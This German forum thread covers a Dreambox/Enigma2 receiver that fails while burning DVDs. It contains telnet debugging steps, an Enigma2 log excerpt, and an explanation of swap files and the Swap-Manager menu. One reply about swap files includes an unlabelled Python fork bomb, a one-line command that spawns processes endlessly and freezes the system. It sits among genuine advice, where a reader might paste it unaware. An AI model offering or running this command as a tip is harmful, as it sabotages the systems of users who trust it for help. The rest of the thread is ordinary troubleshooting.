DVD Brennen stoppt bei 77%?!?

    • DVD Brennen stoppt bei 77%?!?

      hab heut das Samsung SLimline eingebaut
      und 2 x versucht eine dvd zu brennen

      er fängt an mit der Erstellung dann läuft 10 min die Erstellung und plötzlich

      "Unbekannter Fehler aufgetreten"


      zu brennen hat er scheinbar gar nicht begonnen da die DVD Led nie leuchtete
    • RE: DVD Brennen stoppt bei 77%?!?

      kannst du mal folgendes machen

      telnet boxip
      init 4
      enigma2.sh


      telnetfenster nicht schliessen, brenner anwerfen und wenn der fehler kommt hier mal posten ?
      » time to say goodbye «

      Konfuzius sagt:
      Erst wenn eine Mücke auf deinen Hoden landet wirst du lernen Probleme ohne Gewalt zu lösen.
    • so hier mal


      job <Plugins.Extensions.DVDBurn.Process.DVDJob object at 0x2f6001d0> completed with [<Plugins.Extensions.DVDBurn.Process.BurnTaskPostcondition instance at 0x10c1c698>] in <Plugins.Extensions.DVDBurn.Process.BurnTask object at 0x2e181430>
      allocating new converter!
      allocating new converter!
      reused converter!
      allocating new converter!
      reused converter!
      allocating new converter!
      reused converter!
      allocating new converter!
      warning, skin is missing element Title in <class 'Screens.SimpleSummary.SimpleSummary'>
      warning, skin is missing element Title in <class 'Screens.SimpleSummary.SimpleSummary'>
      poll: unhandled POLLERR/HUP/NVAL for fd 61(17)






      mfg
      tom
    • nach nen Neustart gings dann mit ner Testdatei

      Swap File?!?!?

      Für was ist das und sollte man es erstellen?!?

      PS:
      Hab nen frein USB Stick aber ich find im Menü den Punkt gar nicht Swap File erstellen!??

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von kapsreiter ()

    • Swap File = Auslagerungsdatei(windoof)
      Sie wird im swapmanager erstellt und kann nicht schaden wenn man zum brennen eine hatt.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Original von kapsreiter
      Swap File?!?!?

      Für was ist das und sollte man es erstellen?!?


      Ist sowas wie der virtuelle Zwischenspeicher bei Windows - nur eben für Linux. Es wird dabei eine eigene kleine Partition erzeugt die als Zwischenspeicher dient. Bei der 7000er war diese SWAP-Partition zum Brennen auf DVD noch zwingend erforderlich, da dort der Speicher entsprechend knapp bemessen war. Ob man die bei der 8000 auch zwingend braucht glaube ich nicht, aber wenn Du genug Platz hast, kann es nicht schaden eine SWAP einzurichten.
      Das Menü dazu findest Du unter blaue Taste > NewNigma2-Service > System-Einstellungen > Swap-Manager
      Grüße vom EMU :D
      [Blockierte Grafik: https://mitglied.lycos.de/uwmcheckerz/tierisch018.gif]

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von EMUGurke ()

    • Musst du eventuell noch das NFI Flash installieren?
      Dazu gibt es auch ein FAQ im VIP Bereich von DMM.

      Grüße
      Layouter
      1x DM8000 Newnigma 3.2.2
      1x 7020 HD Newnigma 4.0.2
      1x PVR800HD Newnigma 3.2.2
      2x DM 600 PVR
      Ext. Speicher: QNAP-NAS TS-210, 2x 1 TB 3,5' HDD
    • hm...ich bekomme bei DVD +R DL (Verbatim) immer den Fehler:

      Das wurde abgebrochen mit der Fehlermeldung ""Fehler: es ist ein unbekannter Fehler aufgetreten! ReturncodePostkondition@task DemuxTask"

      Werde das mit dem swap file mal probieren...
    • Original von EMUGurke


      Ist sowas wie der virtuelle Zwischenspeicher bei Windows - nur eben für Linux. Es wird dabei eine eigene kleine Partition erzeugt die als Zwischenspeicher dient. Bei der 7000er war diese SWAP-Partition zum Brennen auf DVD noch zwingend erforderlich, da dort der Speicher entsprechend knapp bemessen war. Ob man die bei der 8000 auch zwingend braucht glaube ich nicht, aber wenn Du genug Platz hast, kann es nicht schaden eine SWAP einzurichten.
      Das Menü dazu findest Du unter blaue Taste > NewNigma2-Service > System-Einstellungen > Swap-Manager


      reichen 64 MB ?
    • Original von wingding
      hm...ich bekomme bei DVD +R DL (Verbatim) immer den Fehler:

      Das wurde abgebrochen mit der Fehlermeldung ""Fehler: es ist ein unbekannter Fehler aufgetreten! ReturncodePostkondition@task DemuxTask"

      Werde das mit dem swap file mal probieren...


      Hallo, hast Du eventuell wegen der Fehlermeldung (ReturncodePostcondition@task) schon etwas herausgefunden? Ich habe das gleiche Problem

      Gruss Koubi